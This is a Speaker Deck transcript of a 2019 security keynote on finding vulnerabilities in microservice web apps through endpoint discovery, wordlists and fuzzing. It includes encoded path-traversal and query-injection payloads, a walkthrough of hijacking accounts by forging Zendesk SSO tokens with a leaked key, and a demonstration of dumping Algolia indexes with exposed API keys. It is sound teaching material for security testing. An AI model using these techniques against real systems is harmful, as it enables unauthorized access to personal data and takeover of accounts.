Upgrade to Pro — share decks privately, control downloads, hide ads and more …

A methodology using fuzzing and info disclosure

Frans Rosén
October 01, 2020
Research
0
220

A methodology using fuzzing and info disclosure

My keynote from the first BSides Ahmedabad in Oct 2019.

Youtube: https://www.youtube.com/watch?v=rAuuN0OohJc

Frans Rosén

October 01, 2020
Tweet

More Decks by Frans Rosén

See All by Frans Rosén
X-Correlation Injections (or How to break server-side contexts)
fransrosen
0
850
Story of a RCE on Apple through hot jar swapping
fransrosen
0
970
Account hijacking using "dirty dancing" in sign-in OAuth-flows
fransrosen
0
160
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
fransrosen
3
8.7k
Web based format injection, dumping memory like it's 99 (or "Please help")
fransrosen
0
68
A story of the passive aggressive sysadmin of AEM
fransrosen
0
7.9k
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
fransrosen
3
6.7k

Other Decks in Research

See All in Research
RSJ2024「基盤モデルの実ロボット応用」チュートリアルA(河原塚)
haraduka
3
650
Weekly AI Agents News! 8月号 プロダクト/ニュースのアーカイブ
masatoto
1
190
第 2 部 11 章「大規模言語モデルの研究開発から実運用に向けて」に向けて / MLOps Book Chapter 11
upura
0
390
文書画像のデータ化における VLM活用 / Use of VLM in document image data conversion
sansan_randd
2
200
Human-Informed Machine Learning Models and Interactions
hiromu1996
2
480
Practical The One Person Framework
asonas
1
1.6k
VisFocus: Prompt-Guided Vision Encoders for OCR-Free Dense Document Understanding
sansan_randd
1
250
20240918 交通くまもとーく 未来の鉄道網編(こねくま)
trafficbrain
0
230
情報処理学会関西支部2024年度定期講演会「自然言語処理と大規模言語モデルの基礎」
ksudoh
6
810
最近のVisual Odometryと Depth Estimation
sgk
1
270
クラウドソーシングによる学習データ作成と品質管理(セキュリティキャンプ2024全国大会D2講義資料)
takumi1001
0
290
[依頼講演] 適応的実験計画法に基づく効率的無線システム設計
k_sato
0
130

Featured

See All Featured
Happy Clients
brianwarren
98
6.7k
The Web Performance Landscape in 2024 [PerfNow 2024]
tammyeverts
0
100
Why Our Code Smells
bkeepers
PRO
334
57k
For a Future-Friendly Web
brad_frost
175
9.4k
Easily Structure & Communicate Ideas using Wireframe
afnizarnur
191
16k
Keith and Marios Guide to Fast Websites
keithpitt
409
22k
GraphQLとの向き合い方2022年版
quramy
43
13k
Building a Scalable Design System with Sketch
lauravandoore
459
33k
Visualizing Your Data: Incorporating Mongo into Loggly Infrastructure
mongodb
42
9.2k
Practical Tips for Bootstrapping Information Extraction Pipelines
honnibal
PRO
10
720
Optimizing for Happiness
mojombo
376
70k
The Art of Delivering Value - GDevCon NA Keynote
reverentgeek
8
900

Transcript

  1. FRANS ROSÉN A methodology using fuzzing and info disclosure

  2. FRANS ROSÉN Security Advisor @detectify CTO @centra HackerOne #5 @

    /leaderboard/all-time Blogs at labs.detectify.com @fransrosen

  3. FRANS ROSÉN Rundown • Imaginary app structure and methodology on

    breaking it

  4. FRANS ROSÉN Rundown • Imaginary app structure and methodology on

    breaking it • Real-life vulnerabilities found
 using these techniques

  5. FRANS ROSÉN Rundown • Imaginary app structure and methodology on

    breaking it • Real-life vulnerabilities found
 using these techniques • Many ways to do this, this is just one example!

  6. FRANS ROSÉN Structure of our imaginary app

  7. FRANS ROSÉN Client based micro services business.example.com SPA + a

    lot of JS

  8. FRANS ROSÉN Client based micro services invoice.example.com business.example.com conversation.example.com api.example.com

    CORS-requests to different apps SPA + a lot of JS

  9. FRANS ROSÉN Client based micro services business.example.com /api/v1/users /api/v1/users/123 …

    /api/v3/invoices /api/v3/invoices/123 … /api/v2/messages /api/v2/messages/123 … CORS-requests to different apps: SPA + a lot of JS invoice.example.com conversation.example.com api.example.com

  10. FRANS ROSÉN Ways forward 1.Locate all APIs/micro-services used

  11. FRANS ROSÉN Ways forward 1.Locate all APIs/micro-services used 2.Extract all

    API-endpoints we can find

  12. FRANS ROSÉN API-endpoints per microservice • invoice.example.com

  13. FRANS ROSÉN API-endpoints per microservice • invoice.example.com /api/v3/invoices /api/v3/invoices/1234 /api/v3/accounts

    /api/v3/accounts/1234 Found in JS:

  14. FRANS ROSÉN API-endpoints per microservice • invoice.example.com Found in JS:

    /invoices* /accounts* /api /api/v3 /api/v3/invoices* /api/v3/accounts* … Save to path-lists: /api/v3/invoices /api/v3/invoices/1234 /api/v3/accounts /api/v3/accounts/1234

  15. FRANS ROSÉN • invoice.example.com Found in JS: /invoices* /accounts* /api

    /api/v3 /api/v3/invoices* /api/v3/accounts* … Save to path-lists: /api/v3/invoices /api/v3/invoices/1234 /api/v3/accounts /api/v3/accounts/1234 The * tells us it supports direct requests or additional paths for IDs or similar: /invoices/123

  16. FRANS ROSÉN API-endpoints per microservice • conversation.example.com /api/v2/online /api/v2/conversations /api/v2/websocket

    Found in JS:

  17. FRANS ROSÉN API-endpoints per microservice • conversation.example.com /api/v2/online /api/v2/conversations /api/v2/websocket

    Found in JS: /online /conversations* /websocket /api/v2 /api/v2/conversations* … Save to path-lists:

  18. FRANS ROSÉN Continue to curate lists Find more endpoints: •

    Desktop client • Web-archive • PHP/Java/Golang-SDKs • npm/composer/yarn • Documentation

  19. FRANS ROSÉN Now we have this • List of all

    available endpoints: /conversations* /invoices* /users* …

  20. FRANS ROSÉN Now we have this • List of all

    available endpoints: • Also separate prefixes: /api /api/v3 /api/v2 /api/v1 … /conversations* /invoices* /users* …

  21. FRANS ROSÉN Now we have this • List of all

    available endpoints: • Also separate prefixes: /api /api/v3 /api/v2 /api/v1 … /conversations* /invoices* /users* … • And all subdomains used: invoice.example.com api.example.com business.example.com …

  22. FRANS ROSÉN Now, combine it all: • Test everything on

    everything
 subdomain-list * path-prefix-list * path-suffix-list • Add additional standard fuzz to suffix-list test " '
 # …

  23. FRANS ROSÉN What we might find • New or old

    endpoints not in use
 Might leak more data than the current one


  24. FRANS ROSÉN What we might find • New or old

    endpoints not in use
 Might leak more data than the current one
 
 Example of this happening IRL!

  25. FRANS ROSÉN { "boards": [ { "id": 123, "user": 124,

    "username": "test" … } ] } API currently in use, v2 /api/v2/boards/123

  26. FRANS ROSÉN /api/v4/boards/123 { "includes": {"user": false}, "boards": [ {

    "id": 123, "user": 124, "username": "test" … } ] v4 was a JSON-API not being used

  27. FRANS ROSÉN /api/v4/boards/123 { "includes": {"user": false}, "boards": [ {

    "id": 123, "user": 124, "username": "test" … } ] Tells us what to include

  28. FRANS ROSÉN /api/v4/boards/123? include=user { "includes": {"user": true}, "boards": [

    { "attributes": { "user": { "email": "[email protected]", "phone": "004324235342" … } "New version of JSON-API for message boards leaked emails + phone numbers for all users"

  29. FRANS ROSÉN What we might find • New or old

    endpoints not in use
 Might leak more data than the current one • That the micro-services might connect server-side:
 SSRF, path-traversal, bypass query-strings used…


  30. FRANS ROSÉN What we might find • New or old

    endpoints not in use
 Might leak more data than the current one • That the micro-services might connect server-side:
 SSRF, path-traversal, bypass query-strings used…
 
 Example of this happening IRL!

  31. FRANS ROSÉN Regular API-endpoint to fetch invoices /api/v3/invoices/123

  32. FRANS ROSÉN Regular API-endpoint to fetch invoices /api/v3/invoices/123 { "invoice":

    { "url": "/api/v3/invoices/ 123?token=xyz&expire=123 } }

  33. FRANS ROSÉN Different ID than my own invoices /api/v3/invoices/124 {

    "error": "access denied" }

  34. FRANS ROSÉN Fuzzing, double quote: /api/v3/invoices/" { "error": "Bad URI:

    /api/v1/ invoices/\"" }

  35. FRANS ROSÉN Sent to v3, error with v1? /api/v3/invoices/" {

    "error": "Bad URI: /api/v1/ invoices/\"" }

  36. FRANS ROSÉN Possible explanation Endpoint at /api/v3/invoices/{id} makes an internal

    call to a different service: route('/api/v3/invoices/{id}', () => { return api.call( `http://internal-api/api/v1/invoices/${id}? token=${userToken}` ) })

  37. FRANS ROSÉN Possible explanation Endpoint at /api/v3/invoices/{id} makes an internal

    call to a different service: route('/api/v3/invoices/{id}', () => { return api.call( `http://internal-api/api/v1/invoices/${id}? token=${userToken}` ) })

  38. FRANS ROSÉN Send valid accessible ID, fuzz query-params /api/v3/invoices/123?FUZZ=x& /api/v3/invoices/123%3fFUZZ%3dx%26

  39. FRANS ROSÉN Send valid accessible ID, fuzz query-params /api/v3/invoices/123?FUZZ=x& /api/v3/invoices/123%3fFUZZ%3dx%26

    Theory: server-side call: http://internal-api/api/v1/invoices/ 123?token=x&token=xxx

  40. FRANS ROSÉN Send valid accessible ID, fuzz query-params { "error":

    "access denied" } /api/v3/invoices/123?FUZZ=x& /api/v3/invoices/123%3fFUZZ%3dx%26 Theory: server-side call: http://internal-api/api/v1/invoices/ 123?token=x&token=xxx

  41. FRANS ROSÉN /api/v3/invoices/123%3ftoken%3dx%26 http://internal-api/api/v1/invoices/ 123?token=x&token=xxx { "error": "access denied" }

    We now know that token is being used! Theory: server-side call:

  42. FRANS ROSÉN Path-traversal, reach outside of invoices/ /api/v3/invoices/%2e%2e%2fFUZZ

  43. FRANS ROSÉN Path-traversal, reach outside of invoices/ /api/v3/invoices/%2e%2e%2fFUZZ We know

    token is used in query, move it to fragment: /api/v3/invoices/%2e%2e%2fFUZZ%23 internal-api/api/v1/invoices/../FUZZ#

  44. FRANS ROSÉN Traversing into accounts/ without the token query parameter

    /api/v3/invoices/%2e%2e%2faccounts%23

  45. FRANS ROSÉN Traversing into accounts/ without the token query parameter

    /api/v3/invoices/%2e%2e%2faccounts%23 { "accounts": [ {"account": 123, "name": "Other Business", "email": "[email protected]", "invoices": [ {"id": 123, "amount": 1100.00 …} {"id": 123, "amount": 1100.00 …} … ]

  46. FRANS ROSÉN "Path-traversal getting access to all invoice accounts" /api/v3/invoices/%2e%2e%2faccounts%23

    { "accounts": [ {"account": 123, "name": "Other Business", "email": "[email protected]", "invoices": [ {"id": 123, "amount": 1100.00 …} {"id": 123, "amount": 1100.00 …} … ] We can access all accounts and all their invoices!

  47. FRANS ROSÉN "Path-traversal getting access to all invoice accounts" {

    "accounts": [ {"account": 123, "name": "Other Business", "email": "[email protected]", "invoices": [ {"id": 123, "amount": 1100.00 …} {"id": 123, "amount": 1100.00 …} … ] http://internal-api /api/v1/invoices/../accounts#token=xxx

  48. FRANS ROSÉN Ways forward 1.Locate all APIs/micro-services used 2.Extract all

    API-endpoints we can find 3.Look at other strings in JS-files

  49. FRANS ROSÉN What we might find • Keys or tokens

    expected to be secrets
 Third party apps with unclear docs if tokens should be secrets. 


  50. FRANS ROSÉN What we might find • Keys or tokens

    expected to be secrets
 Third party apps with unclear docs if tokens should be secrets.
 
 Example of this happening IRL!


  51. FRANS ROSÉN Zendesk SSO-key

  52. FRANS ROSÉN Zendesk SSO-key zdkey: "fafc5aef56caefa56fcea65" zdaccessurl: "https://example.zendesk.com /access/jwt?"

  53. FRANS ROSÉN Zendesk SSO-key • Not an API-key, used for

    JWT-signing for simple SSO

  54. FRANS ROSÉN Zendesk SSO-key • This JSON should be signed

    with the SSO-key: { "iat": 123, "jti": "uuid", "name" "x", "email": "[email protected]", "external_id": "UUID" }

  55. FRANS ROSÉN Zendesk SSO-key • This JSON should be signed

    with the SSO-key: { "iat": 123, "jti": "uuid", "name" "x", "email": "[email protected]", "external_id": "UUID" } unix timestamp random unique ID

  56. FRANS ROSÉN Zendesk SSO-key • This JSON should be signed

    with the SSO-key: { "iat": 123, "jti": "uuid", "name" "x", "email": "[email protected]", "external_id": "UUID" } unix timestamp random unique ID name for user, will be updated email for user, will be updated

  57. FRANS ROSÉN Zendesk SSO-key • This JSON should be signed

    with the SSO-key: { "iat": 123, "jti": "uuid", "name" "x", "email": "[email protected]", "external_id": "UUID" } unix timestamp random unique ID name for user, will be updated email for user, will be updated UserID to hijack account

  58. FRANS ROSÉN Zendesk SSO-key • Send JWT for UserID you

    want to hijack: https://example.zendesk.com/access/jwt? eYAAA.eYBBB.XXX

  59. FRANS ROSÉN Zendesk SSO-key • Send JWT for UserID you

    want to hijack: https://example.zendesk.com/access/jwt? eYAAA.eYBBB.XXX • Zendesk will reply with a session as the UserID: https://example.zendesk.com/hc/en-us? flash_digest=0cbfae0bec0bfea08cbfec0

  60. FRANS ROSÉN "Account hijack on support panel due to publicly

    disclosed Zendesk SSO-key" • Send JWT for UserID you want to hijack: https://example.zendesk.com/access/jwt? eYAAA.eYBBB.XXX • Zendesk will reply with a session as the UserID: https://example.zendesk.com/hc/en-us? flash_digest=0cbfae0bec0bfea08cbfec0

  61. FRANS ROSÉN What we might find • Keys or tokens

    expected to be secrets
 Third party apps with unclear docs if tokens should be secrets.
 
 


  62. FRANS ROSÉN What we might find • Keys or tokens

    expected to be secrets
 Third party apps with unclear docs if tokens should be secrets.
 
 Another example of this happening IRL!


  63. FRANS ROSÉN Algolia API-key Intended to be public a =

    algolia('AFBKDE54', '7ace8b8c7fbea78caebcf78ecbfaebca7 8f'); idx = a.index('userdb');

  64. FRANS ROSÉN a = algolia('AFBKDE54', '7ace8b8c7fbea78caebcf78ecbfaebca7 8f'); idx = a.index('publicdb');

    App-ID Public API-key Algolia API-key Intended to be public Index name

  65. FRANS ROSÉN POST /1/indexes/publicdb/query?x- algolia-application-id=AppID&x- algolia-api-key=PublicApiKey HTTP/1.1 Host: AppId-dsn.algolia.net {"params":"query=*&hitsPerPage=1"}

    Algolia API call

  66. FRANS ROSÉN HTTP/1.1 200 OK {"result": [ {"id": 123, "user":

    "x"}, … ]} POST /1/indexes/publicdb/query

  67. FRANS ROSÉN POST /1/indexes/userdb/query?x- algolia-api-key=PublicApiKey&… {"params":"query=*&hitsPerPage=1"} Try another index +

    Scoped API-key

  68. FRANS ROSÉN POST /1/indexes/userdb/query?x- algolia-api-key=PublicApiKey&… {"message":"Index not allowed with this

    API key","status":403} Try another index + Scoped API-key

  69. FRANS ROSÉN POST /1/indexes/userdb/query?x- algolia-api- key=AnotherPublicApiKey&… {"params":"query=*&hitsPerPage=1"} Unscoped API-key

  70. FRANS ROSÉN HTTP/1.1 200 OK {"result": [ {"id": 123, "user":

    "x", "email": "[email protected]", "phone": "003234234.."}, … ]} Another index with sensitive data

  71. FRANS ROSÉN HTTP/1.1 200 OK {"result": [ {"id": 123, "user":

    "x", "email": "[email protected]", "phone": "003234234.."}, … ]} Another index with sensitive data

  72. FRANS ROSÉN "Emails + phone for all users disclosed due

    to sensitive data in public AlgoliaDB" HTTP/1.1 200 OK {"result": [ {"id": 123, "user": "x", "email": "[email protected]", "phone": "003234234.."}, … ]}

  73. FRANS ROSÉN What we might find • Keys or tokens

    expected to be secrets
 Third party apps with unclear docs if tokens should be secrets. • Secret ENV variables dumped in CI-minification
 If any minifications or 
 
 Example of this happening IRL!


  74. FRANS ROSÉN What we might find

  75. FRANS ROSÉN What we might find

  76. FRANS ROSÉN What we might find

  77. FRANS ROSÉN

  78. FRANS ROSÉN Ways forward 1.Locate all APIs/micro-services used 2.Extract all

    API-endpoints we can find 3.Look at other strings in JS-files 4.Create wordlists

  79. FRANS ROSÉN Wordlists! • For every program:

  80. FRANS ROSÉN Wordlists! • For every program: • Build /

    combine

  81. FRANS ROSÉN Wordlists! • For every program: • Build /

    combine

  82. FRANS ROSÉN Wordlists! • For every program: • Build /

    combine

  83. FRANS ROSÉN Wordlists! • For every program: • Build /

    combine • Apply context!

  84. FRANS ROSÉN Wordlists! • For every program: • Build /

    combine • Apply context! /api/v1/payment /api/v1/payment-methods /api/v1/shipping

  85. FRANS ROSÉN Wordlists! • For every program: • Build /

    combine • Apply context! /api/v1/payment /api/v1/payment-methods /api/v1/shipping /api/v1/shipping-methods Also add this

  86. FRANS ROSÉN Ways forward 1.Locate all APIs/micro-services used 2.Extract all

    API-endpoints we can find 3.Look at other strings in JS-files 4.Create wordlists 5.Fuzz, fuzz, fuzz

  87. FRANS ROSÉN Fuzz with / without • All HTTP-methods POST

    PATCH DELETE PUT… • IDs or not /users/1 vs /users • / in the end /payments/ vs /payments • File extension users.json vs users

  88. FRANS ROSÉN Fuzz combination • Again, combine paths + endpoints

    on subdomains • Skip paths, try all methods, add regular fuzz characters: \ " ' & # .. ö % ? NULL

  89. FRANS ROSÉN • Curate your own context specific wordlists Takeaways

  90. FRANS ROSÉN • Curate your own context specific wordlists •

    Combine with regular fuzzing Takeaways

  91. FRANS ROSÉN • Curate your own context specific wordlists •

    Combine with regular fuzzing • Understand and learn what is being disclosed
 and how to abuse it. Takeaways

  92. FRANS ROSÉN Takeaways That’s it, thank you!
 Any questions? •

    Curate your own context specific wordlists • Combine with regular fuzzing • Understand and learn what is being disclosed
 and how to abuse it.